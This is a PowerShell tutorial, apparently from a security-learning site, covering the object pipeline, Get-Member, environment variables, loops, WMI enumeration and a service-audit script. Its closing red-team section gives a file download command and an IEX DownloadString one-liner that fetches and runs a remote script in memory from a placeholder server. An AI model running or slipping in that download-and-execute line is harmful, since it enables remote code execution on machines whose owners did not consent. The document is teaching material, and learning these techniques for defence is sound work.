PowerShell
What You Will Learn
- How PowerShell’s object-based pipeline works
- How to explore objects using Get-Member and Format-List
- How to use environment variables, loops, and conditions
- How to run practical enumeration commands against Windows systems
What Is It?
PowerShell is a task automation and configuration management framework from Microsoft. Unlike traditional command-line shells (which work with text), PowerShell works with .NET objects — this makes it far more powerful for scripting and automation.
PowerShell is widely used by both system administrators and attackers. Many red team tools (like Empire, PowerView, and Invoke-Mimikatz) are written in PowerShell.
Key Concepts
Understanding Attributes, Properties, and Methods
In PowerShell, everything is an object. Every object has:
- Properties: Data stored in the object (like a file’s name or size).
- Methods: Actions the object can perform (like deleting itself).
Get Properties, Attributes, and Methods of an Object
Any command that produces object-based output can be piped to Get-Member:
Get-Process | Get-Member
# Get all properties of an object
Get-Process | Format-List -Property *
Get Help for a Command
Get-Help <command>
# Example:
Get-Help Get-Process
Select Specific Properties
Get-Process | Select-Object -Property Name, CPU, Id
Environmental Variables
# List all environment variables
Get-ChildItem Env:
# Get a specific variable (e.g., processor architecture)
$env:PROCESSOR_ARCHITECTURE
Reference: https://shellgeek.com/powershell-print-environment-variables/
Piping
# Count the items in the current directory by piping objects into Measure-Object
Get-ChildItem | Measure-Object
Loops
For ($i = 0; $i -le 100; $i++) {
Write-Output "Iteration: $i"
}
Conditions
if ($box -lt 3) {
Write-Output "Less than 3"
}
Variables
$box = "olamide"
$box # prints "olamide"
Practical Examples
Get the 8th Word from a Service Description
# .split(' ') turns the description into an array of words; index 7 is the 8th word
((Get-WmiObject -Class Win32_Service -Filter "Name='wuauserv'").Description).split(' ')[7]
Count Occurrences of a Word in a File
# Count the number of times "polo" appears as a whole word in countpolos.txt
# (the split words are matched against ^polo$ so "polos" is not counted)
((Get-Content .\countpolos.txt).split(' ') | Select-String "^polo$").count
Useful WMI Classes for Enumeration
# Get operating system info
Get-WmiObject -Class Win32_OperatingSystem
# Get BIOS info
Get-WmiObject -Class Win32_Bios
# Get running services
Get-WmiObject -Class Win32_Service
# Get running processes
Get-WmiObject -Class Win32_Process
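The WMI classes above return objects, not text, so the page's other building blocks (Select-Object, Where-Object, environment variables, a loop and a condition) can be chained into a small audit. This is an added example, not code from the original page; it assumes a Windows host where WMI is available and $env:SystemRoot is set, and reports running services whose binary lives outside the Windows directory, which is a quick triage check for unexpected services.

```powershell
# Added example (not from the original page). Assumes Windows with WMI and $env:SystemRoot.

# Service objects carry properties such as Name, State, StartMode and PathName.
$services = Get-WmiObject -Class Win32_Service

# Object-based filtering: running services whose executable is not under $env:SystemRoot.
# PathName may be quoted ("C:\Program Files\..."), so strip the quotes before comparing.
$outside = $services |
    Where-Object {
        $_.State -eq 'Running' -and
        $_.PathName -and
        (($_.PathName -replace '"', '') -notlike "$env:SystemRoot*")
    } |
    Select-Object -Property Name, StartMode, PathName

# Loop with a condition: flag auto-start services, which survive a reboot.
foreach ($svc in $outside) {
    if ($svc.StartMode -eq 'Auto') {
        Write-Output ("[AUTO] {0} -> {1}" -f $svc.Name, $svc.PathName)
    } else {
        Write-Output ("[{0}] {1} -> {2}" -f $svc.StartMode, $svc.Name, $svc.PathName)
    }
}

# Summary count, using Measure-Object as in the Piping section.
Write-Output ("Running services outside {0}: {1}" -f $env:SystemRoot, ($outside | Measure-Object).Count)
```

Pipe $outside into Get-Member to see the remaining properties (for example ProcessId or StartName) if you want to extend the report.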
Download a File (Common in Red Team)
# Download a script from a URL and save it to disk (awareness — not for malicious use)
Invoke-WebRequest -Uri "http://server/script.ps1" -OutFile "C:\script.ps1"
# One-liner to run a remote script in memory
IEX (New-Object Net.WebClient).DownloadString("http://server/script.ps1")